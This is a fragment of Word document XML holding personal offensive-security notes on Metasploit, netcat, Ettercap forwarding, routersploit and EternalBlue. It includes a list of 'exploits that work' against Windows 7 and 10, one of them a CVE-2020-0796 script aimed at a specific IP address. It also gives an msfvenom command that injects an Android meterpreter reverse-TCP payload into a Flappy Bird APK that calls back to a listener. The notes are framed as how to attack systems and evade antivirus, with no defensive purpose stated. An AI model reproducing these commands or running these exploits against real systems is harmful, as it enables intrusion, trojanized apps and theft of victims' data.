      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Makes a machine open a port for us to connect to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0C14F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Firewalls can forbid machines from opening random ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6034F327" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6A60F7E1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Metasploite-FrameWork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25127557" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>go to cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-framework/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C5515" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>to go into it (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8F599" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>in this you can use multiple different commands but USE and SHOW are the most helpful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82C8CB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">use: allows the copy and paste of different types of modules. This can preload the module you chose </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E0843" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Ex. use exploits/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/ms06_040_netapi.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FB734" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">show: This can show all modules </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>availible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>chose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD3F697" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Ex. show exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A8019A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">show info: Helps us by describing what you specific module does and how it can influence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03526FCE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>show options: Helps us select the options for the specific modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C97D2E2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">RHOST: remote host. Target Ip address  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3781DF8D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>RPORT: remote port. Target Port Number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69FE95" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>set: changes options in modules settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59584091" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Ex. set LHOST 192.168.1.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B1DB7C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">set payload: changes the payload type </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273DF199" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>show targets: list all targets that can be affected by exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A5459" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2032A50A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To send it off just type exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F227C7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ECF182" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- Modules </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9D781" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>exploits: Shows exploits for different operating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CD2A15" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Auxiliary: does not execute a payload // does scanning, fingerprinting, sniffing, DDOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D446A3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">Post: After exploiting the target // used to still </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>inforamtion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> from devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6C158" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Payloads: The exploitation to compromise the device. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54168D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">Singles: Payloads that are stand </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>alones</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">. Stagers: Set up a network connection between attacker and victim // small and reliable  Stages: payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>componants</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> downloaded by stagers. // no size limits </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1E0F0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Encoders: Helps us evade antivirus detection system // Mostly known to all antiviruses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614F1620" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">Evasion: do pretty much the same thing as Encoders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210B9A5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Nops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">: Gives instructions to tell processors to do nothing // gives us </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>accessability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to make space for our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AEB79F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>when setting payload options make sure if your device is a 64 bit you specify x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37C72FF2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6F8720F1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Port Forwarding for Ettercap -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E07A913" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">echo 1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> tee /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to turn on and change 1 -&gt; 0 to turn off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE0A8D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2517BC75" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5AA73" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>A program that allows us to establish connections to another machine using both TCP and UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088BE5D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (Ip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>) (Port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FBE5A6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="72A618C6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69114D5A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">to see if you have any active sessions type 'sessions' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1656A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>to enter a sessions type -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> and the (id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C66AE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BEC84" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="505D4C7C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C044B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">to run a sessions over ssh you can enter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D8384" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>ssh (username)@(IP) make sure you have entered once before</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB49BA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="79083830" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>DoublePulsar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B607E8D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Wine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3BD77" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">allows use to execute windows files in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EE85AB0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="62EC17AF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To find wine go to root directory //  ls /root // ls -l // cd .wine/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16557742" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-framework and find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Eternalblue-Doublepulsar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67CCDAEB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>run it like normal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F74F33" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="02A62B9A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3BE35EC7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>routersploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CB7DC1A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> for routers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548399D3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="57B11F53" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Exploits that work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B8DAA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Win 7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73469CC7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/cve_2019_0708_bluekeep_rce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F97F51" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>avuxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/cve_2019_0708_bluekeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C963E89" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>eternalblue_doublepulsar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AE9EE35" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="4B6411F6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Win 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5911F8BC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>python3 cve-2020-0796.py 10.254.245.167</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2180337E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="4E443187" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>How to attack secured systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292CF032" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C077413" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-p: To make a payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCC271" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-x: To inject </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>malicous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> code into a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBC0BBD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">- Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -x flappy-bird-1-3.apk -p android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> LHOST=10.0.2.6 LPORT=4444 -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Test.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C1B55B0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB2F682" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">exploit/multi/handler : a listener </w:t>
      </w:r>
    </w:p>
